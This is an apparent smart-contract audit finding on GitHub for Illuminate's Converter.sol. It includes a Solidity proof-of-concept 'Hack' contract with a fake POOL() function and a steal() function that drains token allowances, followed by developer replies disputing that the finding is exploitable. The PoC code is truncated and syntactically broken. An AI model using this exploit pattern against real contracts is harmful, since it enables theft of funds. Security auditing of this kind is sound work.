sherlock-audit / 2022-10-illuminate-judging

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ctf_sec - Malicious actor can hijack to Converter execution flow and perform malicious approval in Converter.sol #152

Closed sherlock-admin closed 1 year ago

sherlock-admin commented 1 year ago



Malicious actor can hijack to Converter execution flow and perform malicious approval in Converter.sol


Malicious actor can hijack to Converter flow and perform malicious approval.

Vulnerability Detail

Let us look into the implementation for converter.sol

    /// @param c address of the compounding token
    /// @param u address of the underlying token
    /// @param a amount of tokens to convert
    function convert(
        address c,
        address u,
        uint256 a
    ) external {
        // first receive the tokens from msg.sender
        Safe.transferFrom(IERC20(c), msg.sender, address(this), a);

        // get Aave pool
        try IAaveAToken(c).POOL() returns (address pool) {
            // Allow the pool to spend the funds
            Safe.approve(IERC20(u), pool, a);
            // withdraw from Aave
            IAaveLendingPool(pool).withdraw(u, a, msg.sender);

note the external call without validation giving away the whole execution flow in the hand of hackers.

The hacker can use this contract to approve token allowance:

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

interface IAaveLendingPool {
    function withdraw(
    ) external;

    // only used by integration tests
    function deposit(
    ) external;

contract Hack is ERC20 {

    function mint(uint256 amount) {
        _mint(msg.sender, amount);

    function POOL() external returns (address) {
            return address(this);

    function withdraw(
    ) external {
        // do nothing

    function steal(address converter, address token, uint256 amount) external {
        IERC20(token).transferFrom(converter, msg.sender, amount);


First the hacker deploy this contract,

then given the parameter,

    /// @param c address of the compounding token
    /// @param u address of the underlying token
    /// @param a amount of tokens to convert
    function convert(
        address c,
        address u,
        uint256 a
    ) external {

hacker choose the address c as the address of the Hack contract.

the hacker needs to mint some token to bypass:

 Safe.transferFrom(IERC20(c), msg.sender, address(this), a);

then code executes

  try IAaveAToken(c).POOL() returns (address pool) {

this corresponds to:

    function POOL() external returns (address) {
            return address(this);

Ok now the address pool is still the hack address.

then this is important.

Safe.approve(IERC20(u), pool, a);

The hacker can just pick a token address(u), then the contract pool, which is the hack address, have the spending power of amount a in Converter.sol.

Then the code executes:

    IAaveLendingPool(pool).withdraw(u, a, msg.sender);

In the contract hack, we do nothing:

    function withdraw(
    ) external {
        // do nothing


Then any fund that is in Converter is not safe. Maybe when user redeem, the redeem call converter, the converter sliently fail in Compound redeem, the c token stucked in the contract.

I submitted another report explaining how compound redeem can fail silently:

Then after the hacker observe the stucked c token in the contract, he can call steal to complete the exploit

    function steal(address converter, address token, uint256 amount) external {
        IERC20(token).transferFrom(converter, msg.sender, amount);

Code Snippet

Tool used

Manual Review


Whitelist the external contract in Converter.sol!

sourabhmarathe commented 1 year ago

The converter contract does not hold any funds and is only used transiently to conduct conversions from interest bearing assets to the underlying for a given market. As a result, even if the converter contract approves other assets, it isn't clear to me how that would result in user funds being at risk as a result.

JTraversa commented 1 year ago

To give extra flavour, the c param is derived through the redeemer, meaning it cannot be manipulated